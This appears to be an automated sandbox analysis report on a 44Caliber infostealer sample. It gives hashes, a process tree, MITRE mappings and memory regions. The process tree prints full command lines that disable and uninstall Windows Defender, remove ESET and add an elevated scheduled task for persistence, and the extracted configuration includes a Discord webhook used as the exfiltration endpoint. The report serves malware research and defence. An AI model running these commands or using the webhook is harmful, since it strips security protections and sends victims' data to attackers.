Analysis

  • max time kernel
    0s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-12-2023 08:14

General

  • Target

    2eb2782cc346b73b7180e3e9a220041c.exe

  • Size

    9.3MB

  • MD5

    2eb2782cc346b73b7180e3e9a220041c

  • SHA1

    b5d7dbb4f29e2567f9e4d67a9d64d7034ff5a968

  • SHA256

    3220df74888873a8f81e0bde3f4743c25f908bf0c97b768863b67d8d78867425

  • SHA512

    5124335f1362a836dd6f539052f705e64d080fc640abaf489c2407b819de9e79740ca0d5cc8a32310acecdd5e6a6076d83cb4cb7d013fc82b49b060c2b67dec9

  • SSDEEP

    196608:DzB+082zIZNrOYyPugEl4ZXni32eZ3WU5QR6kj09F1lThXBhc+YX7:DzB+GeN/y2jl4N+2KWVR6u0P1l3Sj

Malware Config

Extracted

Family

44caliber

C2

https://discord.com/api/webhooks/868513655556292688/7ViWQKXofSCTi8VWoHEcGeQK61RUEBYfnsE72cu6TJnpHYwlgzbrVI5gQn_jpfUMFoS5

Signatures

  • 44Caliber

    An open source infostealer written in C#.

  • Modifies file permissions 1 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe
    "C:\Users\Admin\AppData\Local\Temp\2eb2782cc346b73b7180e3e9a220041c.exe"
    1⤵
      PID:2164
      • C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
        "C:\Users\Admin\AppData\Local\Temp\Interialoader.exe"
        2⤵
          PID:3872
          • C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
            "C:\Users\Admin\AppData\Local\Temp\Interia loader.exe"
            3⤵
              PID:8
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
                4⤵
                  PID:2224
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                    5⤵
                      PID:3948
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                      5⤵
                        PID:1764
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                        5⤵
                          PID:1992
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit
                        4⤵
                          PID:4792
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:4392
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                          4⤵
                            PID:4608
                          • C:\Users\Admin\AppData\Roaming\Services.exe
                            "C:\Users\Admin\AppData\Roaming\Services.exe"
                            4⤵
                              PID:1980
                          • C:\Users\Admin\AppData\Local\Temp\Insidious.exe
                            "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
                            3⤵
                              PID:4016
                          • C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
                            "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe"
                            2⤵
                              PID:3284
                              • C:\Program Files\Java\jre-1.8\bin\javaw.exe
                                "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe" org.develnext.jphp.ext.javafx.FXLauncher
                                3⤵
                                  PID:4656
                                  • C:\Windows\system32\icacls.exe
                                    C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                    4⤵
                                    • Modifies file permissions
                                    PID:4828
                            • C:\Windows\SYSTEM32\cmd.exe
                              "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
                              1⤵
                                PID:4144
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                  2⤵
                                    PID:2388
                                • C:\Windows\SYSTEM32\cmd.exe
                                  "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
                                  1⤵
                                    PID:3684
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                      2⤵
                                        PID:4496

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v13

                                    Execution

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Persistence

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Privilege Escalation

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Defense Evasion

                                    File and Directory Permissions Modification

                                    1
                                    T1222

                                    Discovery

                                    System Information Discovery

                                    1
                                    T1082

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
                                      Filesize

                                      46B

                                      MD5

                                      0ffdc92ef0ef1d2113843a803410bfe5

                                      SHA1

                                      494059e076659f0d10be0193a76d84620beec10e

                                      SHA256

                                      381d528e3b5bed035139b91470d5e30ad6a2621d1982f89af3582209c0964e9d

                                      SHA512

                                      e2879c4d8ee392cb5d41164d1b877fb7c305903c4b55ae8477b1929394c27fc4252ae10122df4420d8bd7858a80f3686b7f41c5f0bb8c2e22060e939999b160b

                                    • C:\Users\Admin\AppData\Local\Temp\Insidious.exe
                                      Filesize

                                      129KB

                                      MD5

                                      be4d0f0cfaad92c6649c63642a9c77e8

                                      SHA1

                                      f7871532344b41d2e5cd01e4ab5f9b5e8677feb0

                                      SHA256

                                      a079dc22c2933cd886b6729f025e232241e6c55e38f516bea35a8d9fd2ad57ca

                                      SHA512

                                      0d3aa59800f0741ff6260bb71d9a9a69c8c914617f6f5f782641b34adb31f1662096945fabc2499f00cd5f3865eb7fe645f102cfb46e3b6854b4e3421f61e6de

                                    • C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
                                      Filesize

                                      130KB

                                      MD5

                                      b8c480cd3985510ec432aeab8ce6145d

                                      SHA1

                                      ea54074e1dfc8367e665c774d7e40ab9bc40595c

                                      SHA256

                                      064b6bc2393b7c540eea814fc827b76ea26f33e7bedd31b0688f49b1c85c0543

                                      SHA512

                                      b0e582aa1554f5288e3d5ab5562d42352f202435238ece8f43afb698e0547fdbac527db5f13e93d5d0573a7927531ff973afae41c2db2ed94c7d008fbbc37718

                                    • C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
                                      Filesize

                                      165KB

                                      MD5

                                      6755103311086ab6ba3856f36da88f06

                                      SHA1

                                      3def0b8c44210e6d47633d17881e93dae140b75a

                                      SHA256

                                      28d161759cb578592da0ac817903313c20e575a42c2a4a4b7d6070bb09ee17d9

                                      SHA512

                                      6cf9907a75a5ca373729561e4eabd7c988cc010dec0904d6b33f55f0e357689af2b90c51acc92b458ce2a6e7c88ed7b6844a171797c4726a4d0ced80ea62c56f

                                    • C:\Users\Admin\AppData\Local\Temp\Interia loader.exe
                                      Filesize

                                      129KB

                                      MD5

                                      567aecb41e70d64a97efd4c98f3dca43

                                      SHA1

                                      3434762ce941663a4a2d4e5002e3f67f244b7b35

                                      SHA256

                                      0b8f9d996066ce69912ba076ddfe7537f249d64cd5cf52d2166c1026c946123a

                                      SHA512

                                      0b41ae64fc1a8bd5f598816971f471a705962241065310e7baa7b4a2033c4acd4990b41e644da5b350dab417482a932d545c0ffb3cc964f44d889e03e995f9bc

                                    • C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
                                      Filesize

                                      641KB

                                      MD5

                                      1cc25f4b4a4bd06a6330c22bee47e69c

                                      SHA1

                                      ea10bc7220c33d475c01ec89d03731a4c77266b5

                                      SHA256

                                      73d968ccce0ed14a99291e3c6a5c008ad76a9d2e8ebaaa563a876e4479faf7f6

                                      SHA512

                                      5705a2c47c0b91ca755b3f50201085c4a79b2cc3d30dfe88498e937c05d6ae328192efeaa3a3b41b83877cab07c9205ac01bd7b3874b12fe6637fd3b7fea4acc

                                    • C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
                                      Filesize

                                      129KB

                                      MD5

                                      3912ef7e98b0da819b9d3c222fda5cba

                                      SHA1

                                      9305d9f3efe544fa7bf534071139d6ca661077e8

                                      SHA256

                                      c07ed29acb67f5c948a76e2fe6f2e353a43e35d28190f6c3699105c5d3ded9fc

                                      SHA512

                                      11c39febfcb7fc0d41a0640fa11d482a13b4df48a07130d0c41b1cb89596718e36e30e63a9a3829733e587fe0ae51bcf3368e8e9b3f40003b832ec4a4b20eba6

                                    • C:\Users\Admin\AppData\Local\Temp\InteriaVis.exe
                                      Filesize

                                      192KB

                                      MD5

                                      bf6d69f4e699dbd688b667e92c6fe22d

                                      SHA1

                                      3df135b69502bd1e80a9b7ae0182d3d9194b8a6b

                                      SHA256

                                      c4c2239728e40fbf9670e228cd756eadf11eab517755a7cd40da1c511935c234

                                      SHA512

                                      6f60148a7290ceca8f5d25c5c00082f246c197adf4a673f4e69c26da42181b92bc49ae1b7f5d0e26a13b27a015b4a8a0d7e60a4a11f2e50e0e467e0cd21bd73c

                                    • C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
                                      Filesize

                                      403KB

                                      MD5

                                      cc97c0d8c46403d0f068f413e0d37bca

                                      SHA1

                                      573255c8074c816d3d947129788f1ff49cdd0c8e

                                      SHA256

                                      07904e1c1c8a8abbebae73c50387ae1bcb872c96a3d1fffe802448b11211297f

                                      SHA512

                                      ae961a8e93da5722472f65d2f9f94a588029f195b6b34425a6f81ff2760ff7695a585633f944e04e5e18c6a024081ec5fb6e8b96e8ac8b1f1be0a41fed418bfa

                                    • C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
                                      Filesize

                                      348KB

                                      MD5

                                      d130b2d803cc66fe7e879e5222f5e6b3

                                      SHA1

                                      3bbf23a22fbc5c073e038441b82c8f4bcc3a6d6a

                                      SHA256

                                      0604615f2013f8872ff43322226e7ca64f8ae9952596ea81f080c0d03444d5cf

                                      SHA512

                                      3a154f9e8affaf1770f221745a07d91e24ce8a39ee4ad9a53a9da0156de3640a3d293978a7def2d1119676cae015c06d6d05b1ea5766e56ca0ba608dfb4e505c

                                    • C:\Users\Admin\AppData\Local\Temp\Interialoader.exe
                                      Filesize

                                      385KB

                                      MD5

                                      8c4db21c61676e09cef5b1fc6c9700c8

                                      SHA1

                                      f2ee63303b2c4d0efbd6f344d361c604f8f23948

                                      SHA256

                                      07b10e7cdab9b90d7d2f997e8b9c49bce692de120dbef8ff4b51990f5db02fd9

                                      SHA512

                                      367ac06ad02d880ea97f61ac9f0abe40e88b1ed80c0e586dce83290d6f95ea0df0c291060a80b9c4dce323e8e187da7e9324f0ade651930e9e3cce6ebe03b8c0

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                      Filesize

                                      17KB

                                      MD5

                                      f8f848e3792f47b86ac397288fa3f8d7

                                      SHA1

                                      7c4371e46bab5b65d893cacedd03eca1fa33a72b

                                      SHA256

                                      5108a3c3f21488e613fc543c900fcc9874e10677621389573f049bd92fab6061

                                      SHA512

                                      b2371a5109662b975a80839bdc14d1605e310425d56d42058ac5dbc69c7538dc208f175c5025b6646590e4e4826e286ab794cfc01b9d38fbb1db098ca1229c0a

                                    • memory/8-56-0x000000001C710000-0x000000001C720000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/8-343-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/8-124-0x000000001CB20000-0x000000001CD40000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/8-301-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/8-53-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/8-42-0x0000000000850000-0x0000000000A7C000-memory.dmp
                                      Filesize

                                      2.2MB

                                    • memory/1764-159-0x0000022A76480000-0x0000022A76490000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1764-275-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1764-157-0x0000022A76480000-0x0000022A76490000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1764-154-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1980-346-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1992-328-0x00000144EEF60000-0x00000144EEF70000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1992-325-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1992-388-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1992-327-0x00000144EEF60000-0x00000144EEF70000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2164-1-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/2164-2-0x000000001B910000-0x000000001B920000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2164-44-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/2164-0-0x0000000000330000-0x0000000000C7C000-memory.dmp
                                      Filesize

                                      9.3MB

                                    • memory/2388-366-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/2388-378-0x00000239A6C40000-0x00000239A6C50000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2388-374-0x00000239A6C40000-0x00000239A6C50000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3284-52-0x0000000000400000-0x000000000041C000-memory.dmp
                                      Filesize

                                      112KB

                                    • memory/3872-17-0x0000000002890000-0x00000000028A0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3872-16-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/3872-15-0x0000000000520000-0x0000000000770000-memory.dmp
                                      Filesize

                                      2.3MB

                                    • memory/3872-61-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/3948-120-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/3948-103-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/3948-104-0x00000137EE880000-0x00000137EE890000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/3948-110-0x00000137EF2B0000-0x00000137EF2D2000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/3948-111-0x00000137EE880000-0x00000137EE890000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4016-60-0x0000000000010000-0x000000000005A000-memory.dmp
                                      Filesize

                                      296KB

                                    • memory/4016-63-0x000000001ADE0000-0x000000001ADF0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4016-62-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/4016-358-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/4608-341-0x00000000010F0000-0x0000000001100000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/4608-307-0x0000000000300000-0x0000000000308000-memory.dmp
                                      Filesize

                                      32KB

                                    • memory/4608-314-0x00007FFA828F0000-0x00007FFA833B1000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/4608-323-0x00000000010E0000-0x00000000010E6000-memory.dmp
                                      Filesize

                                      24KB

                                    • memory/4656-116-0x000001BA58230000-0x000001BA58231000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4656-163-0x000001BA59A30000-0x000001BA5AA30000-memory.dmp
                                      Filesize

                                      16.0MB

                                    • memory/4656-122-0x000001BA59A30000-0x000001BA5AA30000-memory.dmp
                                      Filesize

                                      16.0MB

                                    • memory/4656-311-0x000001BA58230000-0x000001BA58231000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4656-308-0x000001BA58230000-0x000001BA58231000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4656-354-0x000001BA58230000-0x000001BA58231000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4656-356-0x000001BA58230000-0x000001BA58231000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4656-144-0x000001BA59A30000-0x000001BA5AA30000-memory.dmp
                                      Filesize

                                      16.0MB

                                    • memory/4656-81-0x000001BA59A30000-0x000001BA5AA30000-memory.dmp
                                      Filesize

                                      16.0MB

                                    • memory/4656-147-0x000001BA58230000-0x000001BA58231000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4656-267-0x000001BA58230000-0x000001BA58231000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4656-168-0x000001BA59A30000-0x000001BA5AA30000-memory.dmp
                                      Filesize

                                      16.0MB